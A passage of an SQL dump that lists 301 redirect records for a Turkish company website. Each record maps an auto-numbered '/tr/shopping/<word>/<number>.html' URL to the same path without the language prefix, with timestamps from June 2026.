00:00:00',301),(66351,'https://3s-technologies.com.tr/tr/shopping/chilostoma/3306325922.html',NULL,'https://3s-technologies.com.tr/shopping/chilostoma/3306325922.html','',1,0,'2026-06-10 22:04:43','0000-00-00 00:00:00',301),(66352,'https://3s-technologies.com.tr/tr/shopping/productus/2864905011.html',NULL,'https://3s-technologies.com.tr/shopping/productus/2864905011.html','',1,0,'2026-06-10 22:04:46','0000-00-00 00:00:00',301),(66353,'https://3s-technologies.com.tr/tr/shopping/cassiterite/1299959375.html',NULL,'https://3s-technologies.com.tr/shopping/cassiterite/1299959375.html','',1,0,'2026-06-10 22:04:49','0000-00-00 00:00:00',301),(66354,'https://3s-technologies.com.tr/tr/shopping/maori/1852379120.html',NULL,'https://3s-technologies.com.tr/shopping/maori/1852379120.html','',1,0,'2026-06-10 22:04:52','0000-00-00 00:00:00',301),(66355,'https://3s-technologies.com.tr/tr/shopping/erucic/3444575966.html',NULL,'https://3s-technologies.com.tr/shopping/erucic/3444575966.html','',1,0,'2026-06-10 22:04:55','0000-00-00 00:00:00',301),(66356,'https://3s-technologies.com.tr/tr/shopping/stoppingout/3763219670.html',NULL,'https://3s-technologies.com.tr/shopping/stoppingout/3763219670.html','',1,0,'2026-06-10 22:04:58','0000-00-00 00:00:00',301),(66357,'https://3s-technologies.com.tr/tr/shopping/emissary/4154091460.html',NULL,'https://3s-technologies.com.tr/shopping/emissary/4154091460.html','',1,0,'2026-06-10 22:05:01','0000-00-00 00:00:00',301),(66358,'https://3s-technologies.com.tr/tr/shopping/aflame/1233851464.html',NULL,'https://3s-technologies.com.tr/shopping/aflame/1233851464.html','',1,0,'2026-06-10 22:05:09','0000-00-00 00:00:00',301),(66359,'https://3s-technologies.com.tr/tr/shopping/cizars/2882751846.html',NULL,'https://3s-technologies.com.tr/shopping/cizars/2882751846.html','',1,0,'2026-06-10 22:05:13','0000-00-00 00:00:00',301),(66360,'https://3s-technologies.com.tr/tr/shopping/lobbing/1395471342.html',NULL,'https://3s-technologies.com.tr/shopping/lobbing/1395471342.html','',1,0,'2026-06-10 22:05:16','0000-00-00 00:00:00',301),(66361,'https://3s-technologies.com.tr/tr/shopping/symphytum/513969279.html',NULL,'https://3s-technologies.com.tr/shopping/symphytum/513969279.html','',1,0,'2026-06-10 22:05:19','0000-00-00 00:00:00',301),(66362,'https://3s-technologies.com.tr/tr/shopping/altivolant/2294902014.html',NULL,'https://3s-technologies.com.tr/shopping/altivolant/2294902014.html','',1,0,'2026-06-10 22:05:22','0000-00-00 00:00:00',301),(66363,'https://3s-technologies.com.tr/tr/shopping/brachycephalic/2525301334.html',NULL,'https://3s-technologies.com.tr/shopping/brachycephalic/2525301334.html','',1,0,'2026-06-10 22:05:25','0000-00-00 00:00:00',301),(66364,'https://3s-technologies.com.tr/tr/shopping/wordplay/959308876.html',NULL,'https://3s-technologies.com.tr/shopping/wordplay/959308876.html','',1,0,'2026-06-10 22:05:28','0000-00-00 00:00:00',301),(66365,'https://3s-technologies.com.tr/tr/shopping/periodic/3316043757.html',NULL,'https://3s-technologies.com.tr/shopping/periodic/3316043757.html','',1,0,'2026-06-10 22:05:31','0000-00-00 00:00:00',301),(66366,'https://3s-technologies.com.tr/tr/shopping/hierophant/3959516063.html',NULL,'https://3s-technologies.com.tr/shopping/hierophant/3959516063.html','',1,0,'2026-06-10 22:05:34','0000-00-00 00:00:00',301),(66367,'https://3s-technologies.com.tr/tr/shopping/distillment/2510206971.html',NULL,'https://3s-technologies.com.tr/shopping/distillment/2510206971.html','',1,0,'2026-06-10 22:05:37','0000-00-00 00:00:00',301),(66368,'https://3s-technologies.com.tr/tr/shopping/esculentum/765731362.html',NULL,'https://3s-technologies.com.tr/shopping/esculentum/765731362.html','',1,0,'2026-06-10 22:05:40','0000-00-00 00:00:00',301),(66369,'https://3s-technologies.com.tr/tr/shopping/ciliograde/112476530.html',NULL,'https://3s-technologies.com.tr/shopping/ciliograde/112476530.html','',1,0,'2026-06-10 22:05:43','0000-00-00 00:00:00',301),(66370,'https://3s-technologies.com.tr/tr/shopping/sestetto/1263252482.html',NULL,'https://3s-technologies.com.tr/shopping/sestetto/1263252482.html','',1,0,'2026-06-10 22:05:46','0000-00-00 00:00:00',301),(66371,'https://3s-technologies.com.tr/tr/shopping/wartweed/36797223.html',NULL,'https://3s-technologies.com.tr/shopping/wartweed/36797223.html','',1,0,'2026-06-10 22:05:49','0000-00-00 00:00:00',301),(66372,'https://3s-technologies.com.tr/tr/shopping/geochelone/2721998741.html',NULL,'https://3s-technologies.com.tr/shopping/geochelone/2721998741.html','',1,0,'2026-06-10 22:05:52','0000-00-00 00:00:00',301),(66373,'https://3s-technologies.com.tr/tr/shopping/gramineus/1364858241.html',NULL,'https://3s-technologies.com.tr/shopping/gramineus/1364858241.html','',1,0,'2026-06-10 22:05:55','0000-00-00 00:00:00',301),(66374,'https://3s-technologies.com.tr/tr/shopping/moonlighter/3501279058.html',NULL,'https://3s-technologies.com.tr/shopping/moonlighter/3501279058.html','',1,0,'2026-06-10 22:05:58','0000-00-00 00:00:00',301),(66375,'https://3s-technologies.com.tr/tr/shopping/displeaser/3298196906.html',NULL,'https://3s-technologies.com.tr/shopping/displeaser/3298196906.html','',1,0,'2026-06-10 22:06:01','0000-00-00 00:00:00',301),(66376,'https://3s-technologies.com.tr/tr/shopping/distracter/2259140567.html',NULL,'https://3s-technologies.com.tr/shopping/distracter/2259140567.html','',1,0,'2026-06-10 22:06:04','0000-00-00 00:00:00',301),(66377,'https://3s-technologies.com.tr/tr/shopping/horridus/2008639522.html',NULL,'https://3s-technologies.com.tr/shopping/horridus/2008639522.html','',1,0,'2026-06-10 22:06:07','0000-00-00 00:00:00',301),(66378,'https://3s-technologies.com.tr/tr/shopping/collector/156480130.html',NULL,'https://3s-technologies.com.tr/shopping/collector/156480130.html','',1,0,'2026-06-10 22:06:10','0000-00-00 00:00:00',301),(66379,'https://3s-technologies.com.tr/tr/shopping/frostwort/2798794062.html',NULL,'https://3s-technologies.com.tr/shopping/frostwort/2798794062.html','',1,0,'2026-06-10 22:06:13','0000-00-00 00:00:00',301),(66380,'https://3s-technologies.com.tr/tr/shopping/meteoroid/1694563037.html',NULL,'https://3s-technologies.com.tr/shopping/meteoroid/1694563037.html','',1,0,'2026-06-10 22:06:16','0000-00-00 00:00:00',301),(66381,'https://3s-technologies.com.tr/tr/shopping/titillate/2146676353.html',NULL,'https://3s-technologies.com.tr/shopping/titillate/2146676353.html','',1,0,'2026-06-10 22:06:20','0000-00-00 00:00:00',301),(66382,'https://3s-technologies.com.tr/tr/shopping/versatileness/3048531207.html',NULL,'https://3s-technologies.com.tr/shopping/versatileness/3048531207.html','',1,0,'2026-06-10 22:06:23','0000-00-00 00:00:00',301),(66383,'https://3s-technologies.com.tr/tr/shopping/psalmographer/1774717058.html',NULL,'https://3s-technologies.com.tr/shopping/psalmographer/1774717058.html','',1,0,'2026-06-10 22:06:25','0000-00-00 00:00:00',301),(66384,'https://3s-technologies.com.tr/tr/shopping/carpophada/3153384289.html',NULL,'https://3s-technologies.com.tr/shopping/carpophada/3153384289.html','',1,0,'2026-06-10 22:06:28','0000-00-00 00:00:00',301),(66385,'https://3s-technologies.com.tr/tr/shopping/wreathless/1282539630.html',NULL,'https://3s-technologies.com.tr/shopping/wreathless/1282539630.html','',1,0,'2026-06-10 22:06:32','0000-00-00 00:00:00',301),(66386,'https://3s-technologies.com.tr/tr/shopping/prodigious/1746350279.html',NULL,'https://3s-technologies.com.tr/shopping/prodigious/1746350279.html','',1,0,'2026-06-10 22:06:35','0000-00-00 00:00:00',301),(66387,'https://3s-technologies.com.tr/tr/shopping/hypophysis/1367563090.html',NULL,'https://3s-technologies.com.tr/shopping/hypophysis/1367563090.html','',1,0,'2026-06-10 22:06:38','0000-00-00 00:00:00',301),(66388,'https://3s-technologies.com.tr/tr/shopping/hautgout/2803759586.html',NULL,'https://3s-technologies.com.tr/shopping/hautgout/2803759586.html','',1,0,'2026-06-10 22:06:41','0000-00-00 00:00:00',301),(66389,'https://3s-technologies.com.tr/tr/shopping/honorarium/2529890122.html',NULL,'https://3s-technologies.com.tr/shopping/honorarium/2529890122.html','',1,0,'2026-06-10 22:06:44','0000-00-00 00:00:00',301),(66390,'https://3s-technologies.com.tr/tr/shopping/muscari/2208338181.html',NULL,'https://3s-technologies.com.tr/shopping/muscari/2208338181.html','',1,0,'2026-06-10 22:06:47','0000-00-00 00:00:00',301),(66391,'https://3s-technologies.com.tr/tr/shopping/quindem/3070755700.html',NULL,'https://3s-technologies.com.tr/shopping/quindem/3070755700.html','',1,0,'2026-06-10 22:06:50','0000-00-00 00:00:00',301),(66392,'https://3s-technologies.com.tr/tr/shopping/whisker/3164232475.html',NULL,'https://3s-technologies.com.tr/shopping/whisker/3164232475.html','',1,0,'2026-06-10 22:06:53','0000-00-00 00:00:00',301),(66393,'https://3s-technologies.com.tr/tr/shopping/despitefulness/707407109.html',NULL,'https://3s-technologies.com.tr/shopping/despitefulness/707407109.html','',1,0,'2026-06-10 22:06:56','0000-00-00 00:00:00',301),(66394,'https://3s-technologies.com.tr/tr/shopping/teutonicism/1763098184.html',NULL,'https://3s-technologies.com.tr/shopping/teutonicism/1763098184.html','',1,0,'2026-06-10 22:07:00','0000-00-00 00:00:00',301),(66395,'https://3s-technologies.com.tr/tr/shopping/veratric/4256073955.html',NULL,'https://3s-technologies.com.tr/shopping/veratric/4256073955.html','',1,0,'2026-06-10 22:07:02','0000-00-00 00:00:00',301),(66396,'https://3s-technologies.com.tr/tr/shopping/catspaw/407940438.html',NULL,'https://3s-technologies.com.tr/shopping/catspaw/407940438.html','',1,0,'2026-06-10 22:07:05','0000-00-00 00:00:00',301),(66397,'https://3s-technologies.com.tr/tr/shopping/wreathe/122883273.html',NULL,'https://3s-technologies.com.tr/shopping/wreathe/122883273.html','',1,0,'2026-06-10 22:07:08','0000-00-00 00:00:00',301),(66398,'https://3s-technologies.com.tr/tr/shopping/betterness/241008723.html',NULL,'https://3s-technologies.com.tr/shopping/betterness/241008723.html','',1,0,'2026-06-10 22:07:11','0000-00-00 00:00:00',301),(66399,'https://3s-technologies.com.tr/tr/shopping/leful/4052651439.html',NULL,'https://3s-technologies.com.tr/shopping/leful/4052651439.html','',1,0,'2026-06-10 22:07:14','0000-00-00 00:00:00',301),(66400,'https://3s-technologies.com.tr/tr/shopping/asthenia/2267646319.html',NULL,'https://3s-technologies.com.tr/shopping/asthenia/2267646319.html','',1,0,'2026-06-10 22:07:17','0000-00-00 00:00:00',301),(66401,'https://3s-technologies.com.tr/tr/shopping/antichronically/1779241139.html',NULL,'https://3s-technologies.com.tr/shopping/antichronically/1779241139.html','',1,0,'2026-06-10 22:07:20','0000-00-00 00:00:00',301),(66402,'https://3s-technologies.com.tr/tr/shopping/carceral/3223616561.html',NULL,'https://3s-technologies.com.tr/shopping/carceral/3223616561.html','',1,0,'2026-06-10 22:07:23','0000-00-00 00:00:00',301),(66403,'https://3s-technologies.com.tr/tr/shopping/monumental/3189044689.html',NULL,'https://3s-technologies.com.tr/shopping/monumental/3189044689.html','',1,0,'2026-06-10 22:07:26','0000-00-00 00:00:00',301),(66404,'https://3s-technologies.com.tr/tr/shopping/clianthus/3225894320.html',NULL,'https://3s-technologies.com.tr/shopping/clianthus/3225894320.html','',1,0,'2026-06-10 22:07:29','0000-00-00 00:00:00',301),(66405,'https://3s-technologies.com.tr/tr/shopping/sessa/2996288524.html',NULL,'https://3s-technologies.com.tr/shopping/sessa/2996288524.html','',1,0,'2026-06-10 22:07:32','0000-00-00 00:00:00',301),(66406,'https://3s-technologies.com.tr/tr/shopping/howadji/1413496021.html',NULL,'https://3s-technologies.com.tr/shopping/howadji/1413496021.html','',1,0,'2026-06-10 22:07:36','0000-00-00 00:00:00',301),(66407,'https://3s-technologies.com.tr/tr/shopping/urocerata/3134161816.html',NULL,'https://3s-technologies.com.tr/shopping/urocerata/3134161816.html','',1,0,'2026-06-10 22:07:38','0000-00-00 00:00:00',301),(66408,'https://3s-technologies.com.tr/tr/shopping/earthquake/4161222577.html',NULL,'https://3s-technologies.com.tr/shopping/earthquake/4161222577.html','',1,0,'2026-06-10 22:07:41','0000-00-00 00:00:00',301),(66409,'https://3s-technologies.com.tr/tr/shopping/adelphia/2815378444.html',NULL,'https://3s-technologies.com.tr/shopping/adelphia/2815378444.html','',1,0,'2026-06-10 22:07:45','0000-00-00 00:00:00',301),(66410,'https://3s-technologies.com.tr/tr/shopping/arbalest/4229984951.html',NULL,'https://3s-technologies.com.tr/shopping/arbalest/4229984951.html','',1,0,'2026-06-10 22:07:47','0000-00-00 00:00:00',301),(66411,'https://3s-technologies.com.tr/tr/shopping/louisette/1677928301.html',NULL,'https://3s-technologies.com.tr/shopping/louisette/1677928301.html','',1,0,'2026-06-10 22:07:51','0000-00-00 00:00:00',301),(66412,'https://3s-technologies.com.tr/tr/shopping/cardiidae/3296984807.html',NULL,'https://3s-technologies.com.tr/shopping/cardiidae/3296984807.html','',1,0,'2026-06-10 22:07:53','0000-00-00 00:00:00',301),(66413,'https://3s-technologies.com.tr/tr/shopping/infeodation/2098479984.html',NULL,'https://3s-technologies.com.tr/shopping/infeodation/2098479984.html','',1,0,'2026-06-10 22:07:56','0000-00-00 00:00:00',301),(66414,'https://3s-technologies.com.tr/tr/shopping/neuroma/347743529.html',NULL,'https://3s-technologies.com.tr/shopping/neuroma/347743529.html','',1,0,'2026-06-10 22:08:00','0000-00-00 00:00:00',301),(66415,'https://3s-technologies.com.tr/tr/shopping/legitimist/3159643671.html',NULL,'https://3s-technologies.com.tr/shopping/legitimist/3159643671.html','',1,0,'2026-06-10 22:08:02','0000-00-00 00:00:00',301),(66416,'https://3s-technologies.com.tr/tr/shopping/campaig/3326105158.html',NULL,'https://3s-technologies.com.tr/shopping/campaig/3326105158.html','',1,0,'2026-06-10 22:08:05','0000-00-00 00:00:00',301),(66417,'https://3s-technologies.com.tr/tr/shopping/totalizator/3114642188.html',NULL,'https://3s-technologies.com.tr/shopping/totalizator/3114642188.html','',1,0,'2026-06-10 22:08:09','0000-00-00 00:00:00',301),(66418,'https://3s-technologies.com.tr/tr/shopping/disagreed/299105733.html',NULL,'https://3s-technologies.com.tr/shopping/disagreed/299105733.html','',1,0,'2026-06-10 22:08:12','0000-00-00 00:00:00',301),(66419,'https://3s-technologies.com.tr/tr/shopping/wanhorn/655619867.html',NULL,'https://3s-technologies.com.tr/shopping/wanhorn/655619867.html','',1,0,'2026-06-10 22:08:17','0000-00-00 00:00:00',301),(66420,'https://3s-technologies.com.tr/tr/shopping/manifolding/1923242396.html',NULL,'https://3s-technologies.com.tr/shopping/manifolding/1923242396.html','',1,0,'2026-06-10 22:08:21','0000-00-00 00:00:00',301),(66421,'https://3s-technologies.com.tr/tr/shopping/syllogistically/4164858858.html',NULL,'https://3s-technologies.com.tr/shopping/syllogistically/4164858858.html','',1,0,'2026-06-10 22:08:23','0000-00-00 00:00:00',301),(66422,'https://3s-technologies.com.tr/tr/shopping/gladeye/815094406.html',NULL,'https://3s-technologies.com.tr/shopping/gladeye/815094406.html','',1,0,'2026-06-10 22:08:27','0000-00-00 00:00:00',301),(66423,'https://3s-technologies.com.tr/tr/shopping/accoil/2899564442.html',NULL,'https://3s-technologies.com.tr/shopping/accoil/2899564442.html','',1,0,'2026-06-10 22:08:30','0000-00-00 00:00:00',301),(66424,'https://3s-technologies.com.tr/tr/shopping/adurol/2354110092.html',NULL,'https://3s-technologies.com.tr/shopping/adurol/2354110092.html','',1,0,'2026-06-10 22:08:32','0000-00-00 00:00:00',301),(66425,'https://3s-technologies.com.tr/tr/shopping/priestcraft/3435004554.html',NULL,'https://3s-technologies.com.tr/shopping/priestcraft/3435004554.html','',1,0,'2026-06-10 22:08:35','0000-00-00 00:00:00',301),(66426,'https://3s-technologies.com.tr/tr/shopping/diastasis/2819132840.html',NULL,'https://3s-technologies.com.tr/shopping/diastasis/2819132840.html','',1,0,'2026-06-10 22:08:38','0000-00-00 00:00:00',301),(66427,'https://3s-technologies.com.tr/tr/shopping/siderosis/3118018877.html',NULL,'https://3s-technologies.com.tr/shopping/siderosis/3118018877.html','',1,0,'2026-06-10 22:08:42','0000-00-00 00:00:00',301),(66428,'https://3s-technologies.com.tr/tr/shopping/metabola/3448116178.html',NULL,'https://3s-technologies.com.tr/shopping/metabola/3448116178.html','',1,0,'2026-06-10 22:08:47','0000-00-00 00:00:00',301),(66429,'https://3s-technologies.com.tr/tr/shopping/melancholian/3542298902.html',NULL,'https://3s-technologies.com.tr/shopping/melancholian/3542298902.html','',1,0,'2026-06-10 22:08:49','0000-00-00 00:00:00',301),(66430,'https://3s-technologies.com.tr/tr/shopping/diabaterial/1315053738.html',NULL,'https://3s-technologies.com.tr/shopping/diabaterial/1315053738.html','',1,0,'2026-06-10 22:08:51','0000-00-00 00:00:00',301),(66431,'https://3s-technologies.com.tr/tr/shopping/banquette/1875880387.html',NULL,'https://3s-technologies.com.tr/shopping/banquette/1875880387.html','',1,0,'2026-06-10 22:08:54','0000-00-00 00:00:00',301),(66432,'https://3s-technologies.com.tr/tr/shopping/vaquero/1264087829.html',NULL,'https://3s-technologies.com.tr/shopping/vaquero/1264087829.html','',1,0,'2026-06-10 22:08:57','0000-00-00 00:00:00',301),(66433,'https://3s-technologies.com.tr/tr/shopping/doxologize/1557614390.html',NULL,'https://3s-technologies.com.tr/shopping/doxologize/1557614390.html','',1,0,'2026-06-10 22:09:00','0000-00-00 00:00:00',301),(66434,'https://3s-technologies.com.tr/tr/shopping/reoccupy/2939631811.html',NULL,'https://3s-technologies.com.tr/shopping/reoccupy/2939631811.html','',1,0,'2026-06-10 22:09:03','0000-00-00 00:00:00',301),(66435,'https://3s-technologies.com.tr/tr/shopping/huskiness/2070833523.html',NULL,'https://3s-technologies.com.tr/shopping/huskiness/2070833523.html','',1,0,'2026-06-10 22:09:06','0000-00-00 00:00:00',301),(66436,'https://3s-technologies.com.tr/tr/shopping/nestfuls/2522596485.html',NULL,'https://3s-technologies.com.tr/shopping/nestfuls/2522596485.html','',1,0,'2026-06-10 22:09:09','0000-00-00 00:00:00',301),(66437,'https://3s-technologies.com.tr/tr/shopping/wholehoofed/3499903436.html',NULL,'https://3s-technologies.com.tr/shopping/wholehoofed/3499903436.html','',1,0,'2026-06-10 22:09:12','0000-00-00 00:00:00',301),(66438,'https://3s-technologies.com.tr/tr/shopping/abampere/2117210644.html',NULL,'https://3s-technologies.com.tr/shopping/abampere/2117210644.html','',1,0,'2026-06-10 22:09:18','0000-00-00 00:00:00',301),(66439,'https://3s-technologies.com.tr/tr/shopping/geraniine/1241027973.html',NULL,'https://3s-technologies.com.tr/shopping/geraniine/1241027973.html','',1,0,'2026-06-10 22:09:21','0000-00-00 00:00:00',301),(66440,'https://3s-technologies.com.tr/tr/shopping/unwarrantably/3058709752.html',NULL,'https://3s-technologies.com.tr/shopping/unwarrantably/3058709752.html','',1,0,'2026-06-10 22:09:25','0000-00-00 00:00:00',301),(66441,'https://3s-technologies.com.tr/tr/shopping/myelocoele/226077883.html',NULL,'https://3s-technologies.com.tr/shopping/myelocoele/226077883.html','',1,0,'2026-06-10 22:09:28','0000-00-00 00:00:00',301),(66442,'https://3s-technologies.com.tr/tr/shopping/diluvialist/2426021928.html',NULL,'https://3s-technologies.com.tr/shopping/diluvialist/2426021928.html','',1,0,'2026-06-10 22:09:31','0000-00-00 00:00:00',301),(66443,'https://3s-technologies.com.tr/tr/shopping/diapason/3837850401.html',NULL,'https://3s-technologies.com.tr/shopping/diapason/3837850401.html','',1,0,'2026-06-10 22:09:34','0000-00-00 00:00:00',301),(66444,'https://3s-technologies.com.tr/tr/shopping/peucedanum/1040741431.html',NULL,'https://3s-technologies.com.tr/shopping/peucedanum/1040741431.html','',1,0,'2026-06-10 22:09:37','0000-00-00 00:00:00',301),(66445,'https://3s-technologies.com.tr/tr/shopping/enchainment/1477182788.html',NULL,'https://3s-technologies.com.tr/shopping/enchainment/1477182788.html','',1,0,'2026-06-10 22:09:40','0000-00-00 00:00:00',301),(66446,'https://3s-technologies.com.tr/tr/shopping/intrafoliaceous/83075512.html',NULL,'https://3s-technologies.com.tr/shopping/intrafoliaceous/83075512.html','',1,0,'2026-06-10 22:09:48','0000-00-00 00:00:00',301),(66447,'https://3s-technologies.com.tr/tr/shopping/spitchcock/3689890061.html',NULL,'https://3s-technologies.com.tr/shopping/spitchcock/3689890061.html','',1,0,'2026-06-10 22:09:51','0000-00-00 00:00:00',301),(66448,'https://3s-technologies.com.tr/tr/shopping/smilaceae/923664573.html',NULL,'https://3s-technologies.com.tr/shopping/smilaceae/923664573.html','',1,0,'2026-06-10 22:09:55','0000-00-00 00:00:00',301),(66449,'https://3s-technologies.com.tr/tr/shopping/cirrigerous/168706121.html',NULL,'https://3s-technologies.com.tr/shopping/cirrigerous/168706121.html','',1,0,'2026-06-10 22:09:58','0000-00-00 00:00:00',301),(66450,'https://3s-technologies.com.tr/tr/shopping/loveful/3116806762.html',NULL,'https://3s-technologies.com.tr/shopping/loveful/3116806762.html','',1,0,'2026-06-10 22:10:01','0000-00-00 00:00:00',301),(66451,'https://3s-technologies.com.tr/tr/shopping/hydriodide/3819545055.html',NULL,'https://3s-technologies.com.tr/shopping/hydriodide/3819545055.html','',1,0,'2026-06-10 22:10:03','0000-00-00 00:00:00',301),(66452,'https://3s-technologies.com.tr/tr/shopping/loupsgarous/3495314632.html',NULL,'https://3s-technologies.com.tr/shopping/loupsgarous/3495314632.html','',1,0,'2026-06-10 22:10:07','0000-00-00 00:00:00',301),(66453,'https://3s-technologies.com.tr/tr/shopping/spalpeen/1480723000.html',NULL,'https://3s-technologies.com.tr/shopping/spalpeen/1480723000.html','',1,0,'2026-06-10 22:10:10','0000-00-00 00:00:00',301),(66454,'https://3s-technologies.com.tr/tr/shopping/platyrrhinos/3269501901.html',NULL,'https://3s-technologies.com.tr/shopping/platyrrhinos/3269501901.html','',1,0,'2026-06-10 22:10:13','0000-00-00 00:00:00',301),(66455,'https://3s-technologies.com.tr/tr/shopping/gascoines/3810203940.html',NULL,'https://3s-technologies.com.tr/shopping/gascoines/3810203940.html','',1,0,'2026-06-10 22:10:16','0000-00-00 00:00:00',301),(66456,'https://3s-technologies.com.tr/tr/shopping/goloeshoe/1355517126.html',NULL,'https://3s-technologies.com.tr/shopping/goloeshoe/1355517126.html','',1,0,'2026-06-10 22:10:19','0000-00-00 00:00:00',301),(66457,'https://3s-technologies.com.tr/tr/shopping/sabalo/2139499828.html',NULL,'https://3s-technologies.com.tr/shopping/sabalo/2139499828.html','',1,0,'2026-06-10 22:10:22','0000-00-00 00:00:00',301),(66458,'https://3s-technologies.com.tr/tr/shopping/revolutionist/1727336769.html',NULL,'https://3s-technologies.com.tr/shopping/revolutionist/1727336769.html','',1,0,'2026-06-10 22:10:25','0000-00-00 00:00:00',301),(66459,'https://3s-technologies.com.tr/tr/shopping/allantois/684087661.html',NULL,'https://3s-technologies.com.tr/shopping/allantois/684087661.html','',1,0,'2026-06-10 22:10:28','0000-00-00 00:00:00',301),(66460,'https://3s-technologies.com.tr/tr/shopping/birlie/2120587333.html',NULL,'https://3s-technologies.com.tr/shopping/birlie/2120587333.html','',1,0,'2026-06-10 22:10:30','0000-00-00 00:00:00',301),(66461,'https://3s-technologies.com.tr/tr/shopping/anthelion/3959170721.html',NULL,'https://3s-technologies.com.tr/shopping/anthelion/3959170721.html','',1,0,'2026-06-10 22:10:35','0000-00-00 00:00:00',301),(66462,'https://3s-technologies.com.tr/tr/shopping/napierian/2141924026.html',NULL,'https://3s-technologies.com.tr/shopping/napierian/2141924026.html','',1,0,'2026-06-10 22:10:38','0000-00-00 00:00:00',301),(66463,'https://3s-technologies.com.tr/tr/shopping/orbitonasal/2675103462.html',NULL,'https://3s-technologies.com.tr/shopping/orbitonasal/2675103462.html','',1,0,'2026-06-10 22:10:40','0000-00-00 00:00:00',301),(66464,'https://3s-technologies.com.tr/tr/shopping/unwares/293400931.html',NULL,'https://3s-technologies.com.tr/shopping/unwares/293400931.html','',1,0,'2026-06-10 22:10:43','0000-00-00 00:00:00',301),(66465,'https://3s-technologies.com.tr/tr/shopping/unlodge/2097267885.html',NULL,'https://3s-technologies.com.tr/shopping/unlodge/2097267885.html','',1,0,'2026-06-10 22:10:46','0000-00-00 00:00:00',301),(66466,'https://3s-technologies.com.tr/tr/shopping/nontenure/3638317003.html',NULL,'https://3s-technologies.com.tr/shopping/nontenure/3638317003.html','',1,0,'2026-06-10 22:10:49','0000-00-00 00:00:00',301),(66467,'https://3s-technologies.com.tr/tr/shopping/pentine/1658410840.html',NULL,'https://3s-technologies.com.tr/shopping/pentine/1658410840.html','',1,0,'2026-06-10 22:10:52','0000-00-00 00:00:00',301),(66468,'https://3s-technologies.com.tr/tr/shopping/petticoat/3395756351.html',NULL,'https://3s-technologies.com.tr/shopping/petticoat/3395756351.html','',1,0,'2026-06-10 22:10:55','0000-00-00 00:00:00',301),(66469,'https://3s-technologies.com.tr/tr/shopping/anoura/3109889861.html',NULL,'https://3s-technologies.com.tr/shopping/anoura/3109889861.html','',1,0,'2026-06-10 22:10:58','0000-00-00 00:00:00',301),(66470,'https://3s-technologies.com.tr/tr/shopping/microsporic/1184046993.html',NULL,'https://3s-technologies.com.tr/shopping/microsporic/1184046993.html','',1,0,'2026-06-10 22:11:01','0000-00-00 00:00:00',301),(66471,'https://3s-technologies.com.tr/tr/shopping/vegetoanimal/3469011428.html',NULL,'https://3s-technologies.com.tr/shopping/vegetoanimal/3469011428.html','',1,0,'2026-06-10 22:11:04','0000-00-00 00:00:00',301),(66472,'https://3s-technologies.com.tr/tr/shopping/ramping/1945791172.html',NULL,'https://3s-technologies.com.tr/shopping/ramping/1945791172.html','',1,0,'2026-06-10 22:11:07','0000-00-00 00:00:00',301),(66473,'https://3s-technologies.com.tr/tr/shopping/paradoxus/1453303782.html',NULL,'https://3s-technologies.com.tr/shopping/paradoxus/1453303782.html','',1,0,'2026-06-10 22:11:10','0000-00-00 00:00:00',301),(66474,'https://3s-technologies.com.tr/tr/shopping/unbenevolence/3957958622.html',NULL,'https://3s-technologies.com.tr/shopping/unbenevolence/3957958622.html','',1,0,'2026-06-10 22:11:13','0000-00-00 00:00:00',301),(66475,'https://3s-technologies.com.tr/tr/shopping/unplume/3099106382.html',NULL,'https://3s-technologies.com.tr/shopping/unplume/3099106382.html','',1,0,'2026-06-10 22:11:16','0000-00-00 00:00:00',301),(66476,'https://3s-technologies.com.tr/tr/shopping/speciosa/3881294459.html',NULL,'https://3s-technologies.com.tr/shopping/speciosa/3881294459.html','',1,0,'2026-06-10 22:11:19','0000-00-00 00:00:00',301),(66477,'https://3s-technologies.com.tr/tr/shopping/commercialize/2828473939.html',NULL,'https://3s-technologies.com.tr/shopping/commercialize/2828473939.html','',1,0,'2026-06-10 22:11:23','0000-00-00 00:00:00',301),(66478,'https://3s-technologies.com.tr/tr/shopping/ministrant/739642342.html',NULL,'https://3s-technologies.com.tr/shopping/ministrant/739642342.html','',1,0,'2026-06-10 22:11:25','0000-00-00 00:00:00',301),(66479,'https://3s-technologies.com.tr/tr/shopping/shaken/2475170788.html',NULL,'https://3s-technologies.com.tr/shopping/shaken/2475170788.html','',1,0,'2026-06-10 22:11:28','0000-00-00 00:00:00',301),(66480,'https://3s-technologies.com.tr/tr/shopping/sulphacid/341779135.html',NULL,'https://3s-technologies.com.tr/shopping/sulphacid/341779135.html','',1,0,'2026-06-10 22:11:33','0000-00-00 00:00:00',301),(66481,'https://3s-technologies.com.tr/tr/shopping/rabbate/172623085.html',NULL,'https://3s-technologies.com.tr/shopping/rabbate/172623085.html','',1,0,'2026-06-10 22:11:36','0000-00-00 00:00:00',301),(66482,'https://3s-technologies.com.tr/tr/shopping/allographic/3493036873.html',NULL,'https://3s-technologies.com.tr/shopping/allographic/3493036873.html','',1,0,'2026-06-10 22:11:39','0000-00-00 00:00:00',301),(66483,'https://3s-technologies.com.tr/tr/shopping/cisleithan/826024340.html',NULL,'https://3s-technologies.com.tr/shopping/cisleithan/826024340.html','',1,0,'2026-06-10 22:11:42','0000-00-00 00:00:00',301),(66484,'https://3s-technologies.com.tr/tr/shopping/sasse/1711918091.html',NULL,'https://3s-technologies.com.tr/shopping/sasse/1711918091.html','',1,0,'2026-06-10 22:11:44','0000-00-00 00:00:00',301),(66485,'https://3s-technologies.com.tr/tr/shopping/landaulet/2462339831.html',NULL,'https://3s-technologies.com.tr/shopping/landaulet/2462339831.html','',1,0,'2026-06-10 22:11:47','0000-00-00 00:00:00',301),(66486,'https://3s-technologies.com.tr/tr/shopping/hooflike/4265350379.html',NULL,'https://3s-technologies.com.tr/shopping/hooflike/4265350379.html','',1,0,'2026-06-10 22:11:50','0000-00-00 00:00:00',301),(66487,'https://3s-technologies.com.tr/tr/shopping/beautify/159856803.html',NULL,'https://3s-technologies.com.tr/shopping/beautify/159856803.html','',1,0,'2026-06-10 22:11:53','0000-00-00 00:00:00',301),(66488,'https://3s-technologies.com.tr/tr/shopping/broadening/481291632.html',NULL,'https://3s-technologies.com.tr/shopping/broadening/481291632.html','',1,0,'2026-06-10 22:11:56','0000-00-00 00:00:00',301),(66489,'https://3s-technologies.com.tr/tr/shopping/bushel/1053835955.html',NULL,'https://3s-technologies.com.tr/shopping/bushel/1053835955.html','',1,0,'2026-06-10 22:11:59','0000-00-00 00:00:00',301),(66490,'https://3s-technologies.com.tr/tr/shopping/slackwater/306054044.html',NULL,'https://3s-technologies.com.tr/shopping/slackwater/306054044.html','',1,0,'2026-06-10 22:12:03','0000-00-00 